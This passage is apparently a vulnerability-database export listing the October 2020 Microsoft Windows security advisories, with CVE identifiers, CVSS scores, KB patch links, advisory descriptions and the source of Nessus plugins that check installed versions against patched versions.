\n[CVE-2020-16939](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16939>) \n[CVE-2020-16980](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16980>) \n[CVE-2020-16972](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16972>) \n[CVE-2020-16967](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16967>) \n[CVE-2020-16876](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16876>) \n[CVE-2020-16919](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16919>) \n[CVE-2020-16940](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16940>) \n[CVE-2020-16908](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16908>) \n[CVE-2020-16909](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16909>) \n[CVE-2020-16920](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16920>) \n[CVE-2020-16907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16907>) \n[CVE-2020-16922](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16922>) \n[CVE-2020-16905](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16905>) \n[CVE-2020-16924](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16924>) \n[CVE-2020-1243](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1243>) \n[CVE-2020-16900](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16900>) \n[CVE-2020-16927](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16927>) \n[CVE-2020-0764](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0764>) \n[CVE-2020-16890](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16890>) \n[CVE-2020-16891](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16891>) \n[CVE-2020-16892](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16892>) \n[CVE-2020-16894](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16894>) \n[CVE-2020-16901](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16901>) \n[CVE-2020-16896](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16896>) \n[CVE-2020-16897](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16897>) \n[CVE-2020-16973](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16973>) \n[CVE-2020-16899](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16899>) \n[CVE-2020-1047](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1047>) \n[CVE-2020-16976](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16976>) \n[CVE-2020-16975](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16975>) \n[CVE-2020-16974](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16974>) \n[CVE-2020-16936](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16936>) \n[CVE-2020-16935](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16935>) \n[CVE-2020-1167](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1167>) \n[CVE-2020-16877](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16877>) \n[CVE-2020-16912](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16912>) \n[CVE-2020-1080](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1080>) \n[CVE-2020-16914](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16914>) \n[CVE-2020-16916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16916>) \n[CVE-2020-16911](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16911>) \n[CVE-2020-16910](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16910>) \n[CVE-2020-16913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16913>) \n[CVE-2020-16938](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16938>) \n[CVE-2020-16915](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16915>) \n[CVE-2020-16921](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16921>) \n[CVE-2020-16895](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16895>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-16923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16923>)6.8High \n[CVE-2020-16889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16889>)2.1Warning \n[CVE-2020-16887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16887>)4.6Warning \n[CVE-2020-16902](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16902>)7.2High \n[CVE-2020-16885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16885>)4.6Warning \n[CVE-2020-16898](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16898>)5.8High \n[CVE-2020-16968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16968>)9.3Critical \n[CVE-2020-16939](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16939>)4.6Warning \n[CVE-2020-16980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16980>)4.6Warning \n[CVE-2020-16972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16972>)4.6Warning \n[CVE-2020-16967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16967>)9.3Critical \n[CVE-2020-16876](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16876>)4.6Warning \n[CVE-2020-16919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16919>)2.1Warning \n[CVE-2020-16940](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16940>)4.9Warning \n[CVE-2020-16908](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16908>)7.2High \n[CVE-2020-16909](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16909>)4.6Warning \n[CVE-2020-16920](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16920>)4.6Warning \n[CVE-2020-16907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16907>)7.2High \n[CVE-2020-16922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16922>)2.1Warning \n[CVE-2020-16905](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16905>)4.6Warning \n[CVE-2020-16924](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16924>)9.3Critical \n[CVE-2020-1243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1243>)4.6Warning \n[CVE-2020-16900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16900>)4.6Warning \n[CVE-2020-16927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16927>)7.8Critical \n[CVE-2020-0764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0764>)4.6Warning \n[CVE-2020-16890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16890>)7.2High \n[CVE-2020-16891](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16891>)7.2High \n[CVE-2020-16892](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16892>)4.6Warning \n[CVE-2020-16894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16894>)6.8High \n[CVE-2020-16901](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16901>)2.1Warning \n[CVE-2020-16896](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16896>)5.0Critical \n[CVE-2020-16897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16897>)2.1Warning \n[CVE-2020-16973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16973>)4.6Warning \n[CVE-2020-16899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16899>)7.8Critical \n[CVE-2020-1047](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1047>)7.2High \n[CVE-2020-16976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16976>)4.6Warning \n[CVE-2020-16975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16975>)4.6Warning \n[CVE-2020-16974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16974>)4.6Warning \n[CVE-2020-16936](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16936>)4.6Warning \n[CVE-2020-16935](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16935>)7.2High \n[CVE-2020-1167](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1167>)9.3Critical \n[CVE-2020-16877](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16877>)3.6Warning \n[CVE-2020-16912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16912>)4.6Warning \n[CVE-2020-1080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1080>)7.2High \n[CVE-2020-16914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16914>)2.1Warning \n[CVE-2020-16916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16916>)7.2High \n[CVE-2020-16911](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16911>)9.3Critical \n[CVE-2020-16910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16910>)4.3Warning \n[CVE-2020-16913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16913>)7.2High \n[CVE-2020-16938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16938>)2.1Warning \n[CVE-2020-16915](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16915>)6.8High \n[CVE-2020-16921](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16921>)2.1Warning \n[CVE-2020-16895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16895>)7.2High\n\n### *KB list*:\n[4577041](<http://support.microsoft.com/kb/4577041>) \n[4577049](<http://support.microsoft.com/kb/4577049>) \n[4580328](<http://support.microsoft.com/kb/4580328>) \n[4580330](<http://support.microsoft.com/kb/4580330>) \n[4580327](<http://support.microsoft.com/kb/4580327>) \n[4580346](<http://support.microsoft.com/kb/4580346>) \n[4579311](<http://support.microsoft.com/kb/4579311>) \n[4580353](<http://support.microsoft.com/kb/4580353>) \n[4580347](<http://support.microsoft.com/kb/4580347>) \n[4580382](<http://support.microsoft.com/kb/4580382>) \n[4580358](<http://support.microsoft.com/kb/4580358>) \n[4577668](<http://support.microsoft.com/kb/4577668>) \n[4577671](<http://support.microsoft.com/kb/4577671>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-13T00:00:00", "type": "kaspersky", "title": "KLA11977 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0764", "CVE-2020-1047", "CVE-2020-1080", "CVE-2020-1167", "CVE-2020-1243", "CVE-2020-16876", "CVE-2020-16877", "CVE-2020-16885", "CVE-2020-16887", "CVE-2020-16889", "CVE-2020-16890", "CVE-2020-16891", "CVE-2020-16892", "CVE-2020-16894", "CVE-2020-16895", "CVE-2020-16896", "CVE-2020-16897", "CVE-2020-16898", "CVE-2020-16899", "CVE-2020-16900", "CVE-2020-16901", "CVE-2020-16902", "CVE-2020-16905", "CVE-2020-16907", "CVE-2020-16908", "CVE-2020-16909", "CVE-2020-16910", "CVE-2020-16911", "CVE-2020-16912", "CVE-2020-16913", "CVE-2020-16914", "CVE-2020-16915", "CVE-2020-16916", "CVE-2020-16919", "CVE-2020-16920", "CVE-2020-16921", "CVE-2020-16922", "CVE-2020-16923", "CVE-2020-16924", "CVE-2020-16927", "CVE-2020-16935", "CVE-2020-16936", "CVE-2020-16938", "CVE-2020-16939", "CVE-2020-16940", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-16972", "CVE-2020-16973", "CVE-2020-16974", "CVE-2020-16975", "CVE-2020-16976", "CVE-2020-16980"], "modified": "2022-01-18T00:00:00", "id": "KLA11977", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-02-19T00:53:28", "description": "The Microsoft 3D Viewer app installed on the remote host is affected by a code execution vulnerability when the Base3D rendering engine improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Microsoft 3D Viewer Base3D Code Execution (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16918", "CVE-2020-17003"], "modified": "2020-11-24T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "href": "https://www.tenable.com/plugins/nessus/141430", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141430);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\"CVE-2020-16918\", \"CVE-2020-17003\");\n script_xref(name:\"ZDI\", value:\"ZDI-20-1246\");\n\n script_name(english:\"Microsoft 3D Viewer Base3D Code Execution (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows app installed on the remote host is affected by a code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft 3D Viewer app installed on the remote host is affected by a code execution vulnerability when the\nBase3D rendering engine improperly handles memory. An attacker who successfully exploited the vulnerability would gain\nexecution on a victim system.\");\n # https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16918\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a0fa39f\");\n # https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17003\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?baf22b1a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-20-1246/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to app version 7.2009.29132.0 or later via the Microsoft Store.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16918\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"wmi_enum_windows_app_store.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Microsoft.Microsoft3DViewer\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('smb_func.inc');\n\napp = 'Microsoft.Microsoft3DViewer';\nwin_port = get_kb_item('SMB/transport');\nif (!win_port) win_port = 445;\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:win_port);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'fixed_version' : '7.2009.29132.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:10:16", "description": "The remote Windows host is missing security update 4579311.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-16922)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-16895)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-16924)\n\n - An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-16885)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1167, CVE-2020-16923)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-16891)\n\n - A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.\n (CVE-2020-16898)\n\n - An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-16892)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability.\n (CVE-2020-16914)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-16902)\n\n - An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-0764)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16890)\n\n - An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16896)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16911)\n\n - An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16897)\n\n - An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. (CVE-2020-16876, CVE-2020-16920)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-16915)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-16940)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points. An attacker who successfully exploited this vulnerability could overwrite or delete a targeted file that would normally require elevated permissions. (CVE-2020-16877)\n\n - A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location. (CVE-2020-16910)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16938)\n\n - A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could cause a target system to stop responding. (CVE-2020-16899)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-16939)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-16905, CVE-2020-16909)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. (CVE-2020-1243)\n\n - An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n (CVE-2020-16921)\n\n - A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-16967, CVE-2020-16968)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-16887)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2020-16927)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-16907, CVE-2020-16913)\n\n - An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory. An attacker who successfully exploited the vulnerability could disclose contents of an affected system's memory.\n (CVE-2020-16937)\n\n - An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16889)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles COM object creation. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n (CVE-2020-16916, CVE-2020-16935)\n\n - An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory. (CVE-2020-16900)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-1047, CVE-2020-1080)\n\n - An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations. An attacker who successfully exploited this vulnerability could read arbitrary files. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability.\n The security update addresses the vulnerability by ensuring the Windows Enterprise App Management Service properly handles file operations. (CVE-2020-16919)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "KB4579311: Windows 10 Version 2004 October 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0764", "CVE-2020-1047", "CVE-2020-1080", "CVE-2020-1167", "CVE-2020-1243", "CVE-2020-16876", "CVE-2020-16877", "CVE-2020-16885", "CVE-2020-16887", "CVE-2020-16889", "CVE-2020-16890", "CVE-2020-16891", "CVE-2020-16892", "CVE-2020-16895", "CVE-2020-16896", "CVE-2020-16897", "CVE-2020-16898", "CVE-2020-16899", "CVE-2020-16900", "CVE-2020-16902", "CVE-2020-16905", "CVE-2020-16907", "CVE-2020-16909", "CVE-2020-16910", "CVE-2020-16911", "CVE-2020-16912", "CVE-2020-16913", "CVE-2020-16914", "CVE-2020-16915", "CVE-2020-16916", "CVE-2020-16919", "CVE-2020-16920", "CVE-2020-16921", "CVE-2020-16922", "CVE-2020-16923", "CVE-2020-16924", "CVE-2020-16927", "CVE-2020-16935", "CVE-2020-16936", "CVE-2020-16937", "CVE-2020-16938", "CVE-2020-16939", "CVE-2020-16940", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-16972", "CVE-2020-16973", "CVE-2020-16974", "CVE-2020-16975", "CVE-2020-16976"], "modified": "2022-05-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_OCT_4579311.NASL", "href": "https://www.tenable.com/plugins/nessus/141423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141423);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-0764\",\n \"CVE-2020-1047\",\n \"CVE-2020-1080\",\n \"CVE-2020-1167\",\n \"CVE-2020-1243\",\n \"CVE-2020-16876\",\n \"CVE-2020-16877\",\n \"CVE-2020-16885\",\n \"CVE-2020-16887\",\n \"CVE-2020-16889\",\n \"CVE-2020-16890\",\n \"CVE-2020-16891\",\n \"CVE-2020-16892\",\n \"CVE-2020-16895\",\n \"CVE-2020-16896\",\n \"CVE-2020-16897\",\n \"CVE-2020-16898\",\n \"CVE-2020-16899\",\n \"CVE-2020-16900\",\n \"CVE-2020-16902\",\n \"CVE-2020-16905\",\n \"CVE-2020-16907\",\n \"CVE-2020-16909\",\n \"CVE-2020-16910\",\n 